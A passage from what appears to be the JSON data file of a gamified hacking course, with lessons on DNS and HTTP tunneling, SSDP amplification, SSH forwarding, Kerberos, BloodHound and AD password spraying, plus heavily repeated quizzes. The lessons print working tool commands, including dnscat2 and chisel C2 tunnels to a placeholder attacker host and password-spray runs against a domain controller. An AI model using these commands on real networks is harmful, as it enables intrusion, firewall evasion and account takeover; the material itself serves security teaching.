memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"ICMP tunneling works because...","opts":["ICMP is encrypted","Firewalls often allow ICMP (ping) traffic","ICMP is fast","ICMP uses TCP"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-dns-tunnel2","cat":"Network Attacks","title":"DNS Tunneling with dnscat2","diff":3,"xp":200,"intro":"Create a C2 channel through DNS queries.","sections":[{"type":"text","content":"dnscat2 tunnels arbitrary data through DNS queries and responses. Since DNS is almost never blocked, it bypasses most firewalls."},{"type":"code","lang":"bash","content":"# Server (attacker's authoritative DNS)\ndnscat2-server tunnel.attacker.com\n# Client (on target)\ndnscat2 tunnel.attacker.com\n# In the dnscat2 shell:\ncommand (dnscat2) > shell\n# Or use iodine for a full tunnel\niodined -f -c -P password 10.0.0.1 tunnel.attacker.com"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"dnscat2 creates...","opts":["A VPN","A C2 channel through DNS queries and responses","A proxy","An SSH tunnel"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-http-tunnel","cat":"Network Attacks","title":"HTTP Tunneling","diff":2,"xp":150,"intro":"Tunnel traffic through HTTP to bypass firewalls that only allow web traffic.","sections":[{"type":"text","content":"When only port 80/443 is allowed outbound, tunnel your C2, SSH, or SOCKS through HTTP. Chisel and reGeorg are popular tools."},{"type":"code","lang":"bash","content":"# Chisel (HTTP WebSocket tunnel)\n# Server:\nchisel server --reverse --port 80\n# Client (on target):\nchisel client attacker:80 R:socks\n# Or SSH through HTTP proxy\nproxytunnel -p proxy:8080 -d target:22 -a 2222\nssh -p 2222 user@localhost"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"HTTP tunneling works when...","opts":["All ports are blocked","Only web traffic (80/443) is allowed outbound","The network is offline","DNS is disabled"],"ans":1},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-ssdp-amplification","cat":"Network Attacks","title":"SSDP Amplification","diff":3,"xp":200,"intro":"Abuse UPnP for reflected DDoS amplification.","sections":[{"type":"text","content":"SSDP discovery requests to port 1900/UDP generate large XML responses. Spoof the source IP to amplify and redirect the flood."},{"type":"code","lang":"bash","content":"# Find SSDP-enabled devices\nnmap -sU -p 1900 target_range\nshodan search 'port:1900 SSDP'\n# Amplification factor: ~30x\n# Defense: disable UPnP on internet-facing devices"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"SSDP amplification targets...","opts":["Web servers","UPnP-enabled devices that respond to discovery requests","DNS servers","NTP servers"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-ssh-tunneling-detailed","cat":"Network Attacks","title":"SSH Tunneling Deep Dive","diff":2,"xp":150,"intro":"Local, remote, and dynamic port forwarding explained.","sections":[{"type":"text","content":"Local (-L): access remote service locally. Remote (-R): expose local service through remote. Dynamic (-D): SOCKS proxy through SSH."},{"type":"code","lang":"bash","content":"# Local: access internal DB via SSH host\nssh -L 3306:db.internal:3306 user@ssh-host\nmysql -h 127.0.0.1\n# Remote: expose my listener through target\nssh -R 4444:localhost:4444 user@target\n# Dynamic: SOCKS proxy\nssh -D 1080 user@target\nproxychains nmap internal_network"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"SSH -D creates a...","opts":["VPN","SOCKS proxy routing all traffic through the SSH host","File transfer","DNS tunnel"],"ans":1},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-kerberos-basics","cat":"Network Attacks","title":"Kerberos Authentication Basics","diff":2,"xp":150,"intro":"Understand the Kerberos ticket system before attacking it.","sections":[{"type":"text","content":"Kerberos uses tickets: client requests a TGT from the KDC, then uses it to get service tickets (TGS) for specific services. No passwords traverse the network."},{"type":"code","lang":"bash","content":"# Kerberos flow:\n# 1. Client -> KDC: 'I am user X' (AS-REQ)\n# 2. KDC -> Client: TGT encrypted with krbtgt hash (AS-REP)\n# 3. Client -> KDC: TGT + 'I want access to service Y' (TGS-REQ)\n# 4. KDC -> Client: Service ticket encrypted with service hash (TGS-REP)\n# 5. Client -> Service: Service ticket (AP-REQ)"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"The TGT is encrypted with which key?","opts":["The user's password","The krbtgt account's hash","The service account's hash","The computer account's hash"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-ad-enum-bloodhound","cat":"Network Attacks","title":"BloodHound AD Enumeration","diff":3,"xp":200,"intro":"Map Active Directory attack paths visually.","sections":[{"type":"text","content":"BloodHound collects AD relationships and finds the shortest path to Domain Admin through: local admin rights, group memberships, ACLs, and delegations."},{"type":"code","lang":"bash","content":"# Collect data\n.SharpHound.exe --CollectionMethods All --Domain corp.local\n# From Linux\nbloodyAD -d corp.local -u user -p pass --host DC get search\n# Import ZIP into BloodHound GUI\n# Key queries:\n# 'Shortest Path to Domain Admin'\n# 'Kerberoastable Users'"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"BloodHound finds attack paths using...","opts":["Port scanning","AD relationship graph analysis","Brute force","Vulnerability scanning"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-ad-password-spray","cat":"Network Attacks","title":"AD Password Spraying","diff":2,"xp":150,"intro":"Try one password against all domain users.","sections":[{"type":"text","content":"Spray one common password across all users, wait for the lockout timer, then try the next. Avoids account lockout while testing many accounts."},{"type":"code","lang":"bash","content":"crackmapexec smb DC -u users.txt -p 'Spring2024!' --continue-on-success\nspray.sh -smb DC users.txt 'Company123!'\n# Kerbrute (faster, no lockout monitoring)\nkerbrute passwordspray -d corp.local users.txt 'Summer2024!'"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Password spraying avoids lockout by...","opts":["Using encryption","Trying one password across many accounts (not many against one)","Using a VPN","Changing IP addresses"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at 